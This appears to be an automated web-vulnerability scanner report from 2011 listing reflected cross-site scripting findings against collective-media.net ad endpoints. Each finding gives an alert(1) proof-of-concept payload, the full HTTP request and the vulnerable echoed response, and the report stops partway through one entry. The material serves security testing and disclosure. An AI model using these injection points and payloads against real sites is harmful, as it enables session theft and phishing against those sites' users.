Date: Mon, 09 May 2011 14:01:07 GMT
Expires: Mon, 09 May 2011 14:01:07 GMT
DCLK_imp: v7;x;44306;0-0;0;60840454;0/0;0/0/0;;~aopt=2/1/22/0;~okv=;secure=c5c12
7e45a7ac1ac
;~cs=b:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/a;44306;0-0;0;60840454;783-50/50;0/0/0;;~aopt=2/1/22/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 al
...[SNIP]...

3. Cross-site scripting (reflected)  previous  next
There are 147 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 950fa'-alert(1)-'706392fff78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.tribune950fa'-alert(1)-'706392fff78/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;ord=5044004? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Date: Mon, 09 May 2011 13:59:37 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:37 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.tribune950fa'-alert(1)-'706392fff78/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;net=cm;ord=5044004;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.2. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d0da'-alert(1)-'85703a87340 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.tribune/uscell_ldev_300x600_053112d0da'-alert(1)-'85703a87340;tgt=brand;sz=300x600;ord=5044004? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Date: Mon, 09 May 2011 13:59:37 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:37 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_053112d0da'-alert(1)-'85703a87340;tgt=brand;sz=300x600;net=cm;ord=5044004;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.3. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c672b'-alert(1)-'978317c40a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.tribune/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;ord=5044004?&c672b'-alert(1)-'978317c40a6=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 475
Date: Mon, 09 May 2011 13:59:37 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:37 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;net=cm;ord=5044004?&c672b'-alert(1)-'978317c40a6=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.4. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [tgt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The value of the tgt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4594'-alert(1)-'6008b1110f2 was submitted in the tgt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.tribune/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;ord=5044004?d4594'-alert(1)-'6008b1110f2 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 472
Date: Mon, 09 May 2011 13:59:37 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:37 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;net=cm;ord=5044004?d4594'-alert(1)-'6008b1110f2;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.5. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/be_news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13b5f'-alert(1)-'1057096941b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.617013b5f'-alert(1)-'1057096941b/be_news;sz=300x250;ord=949612198? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc; qcdp=1; exdp=1; ibvr=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Mon, 09 May 2011 14:00:24 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 14:00:24 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.617013b5f'-alert(1)-'1057096941b/be_news;sz=300x250;net=q1;ord=949612198;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.6. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/be_news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload baa51'-alert(1)-'50324ee319c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6170/be_newsbaa51'-alert(1)-'50324ee319c;sz=300x250;ord=949612198? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc; qcdp=1; exdp=1; ibvr=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:24 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 14:00:24 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6170/be_newsbaa51'-alert(1)-'50324ee319c;sz=300x250;net=q1;ord=949612198;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.7. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/be_news

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbffc'-alert(1)-'020bebcbb48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6170/be_news;sz=300x250;ord=949612198?&fbffc'-alert(1)-'020bebcbb48=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc; qcdp=1; exdp=1; ibvr=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 451
Date: Mon, 09 May 2011 14:00:24 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 14:00:24 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news;sz=300x250;net=q1;ord=949612198?&fbffc'-alert(1)-'020bebcbb48=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.8. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/be_news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85f88'-alert(1)-'6ad97540a80 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6170/be_news;sz=300x250;ord=949612198?85f88'-alert(1)-'6ad97540a80 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc; qcdp=1; exdp=1; ibvr=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 448
Date: Mon, 09 May 2011 14:00:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 14:00:23 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news;sz=300x250;net=q1;ord=949612198?85f88'-alert(1)-'6ad97540a80;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.9. http://a.collective-media.net/adj/q1.q.gc.6170/news [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 767f8'-alert(1)-'f18e09670b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6170767f8'-alert(1)-'f18e09670b4/news;sz=728x90;ord=949588501? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc; apnx=1; qcms=1; nadp=1; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Mon, 09 May 2011 13:59:55 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:55 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6170767f8'-alert(1)-'f18e09670b4/news;sz=728x90;net=q1;ord=949588501;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.10. http://a.collective-media.net/adj/q1.q.gc.6170/news [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95e8d'-alert(1)-'5badbfc0af3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6170/news95e8d'-alert(1)-'5badbfc0af3;sz=728x90;ord=949588501? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc; apnx=1; qcms=1; nadp=1; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Mon, 09 May 2011 13:59:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:56 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6170/news95e8d'-alert(1)-'5badbfc0af3;sz=728x90;net=q1;ord=949588501;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.11. http://a.collective-media.net/adj/q1.q.gc.6170/news [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/news

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8522d'-alert(1)-'9242ac13858 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6170/news;sz=728x90;ord=949588501?&8522d'-alert(1)-'9242ac13858=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc; apnx=1; qcms=1; nadp=1; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:55 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:55 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6170/news;sz=728x90;net=q1;ord=949588501?&8522d'-alert(1)-'9242ac13858=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.12. http://a.collective-media.net/adj/q1.q.gc.6170/news [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d6f8'-alert(1)-'b758fa577ec was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6170/news;sz=728x90;ord=949588501?6d6f8'-alert(1)-'b758fa577ec HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
